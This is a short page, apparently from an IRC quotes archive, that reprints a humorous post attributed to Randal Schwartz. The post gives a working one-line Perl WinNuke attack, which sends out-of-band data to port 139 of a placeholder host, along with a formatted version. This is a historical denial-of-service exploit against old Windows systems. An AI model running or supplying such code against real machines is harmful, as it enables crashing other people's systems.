![]() |
|
|
|
|
#magna, #SiteDump, #nsb, #llstaff, AustIRC Network
Winnuke in one line? No problem:
perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"bad.dude.com:139")->send("bye",MSG_OOB)'
And formatted so it's a little easier to read:
#!/usr/bin/perl
use IO::Socket;
IO::Socket::INET
->new(PeerAddr=>"bad.dude.com:139")
->send("bye", MSG_OOB);
-- Randal Schwartz
34 online, 2,084,557 hitsCopyright © 2005-2008 sitedump.net Q27BRJH5TS4WKIF@JQF7MS4LYOA8P91.com |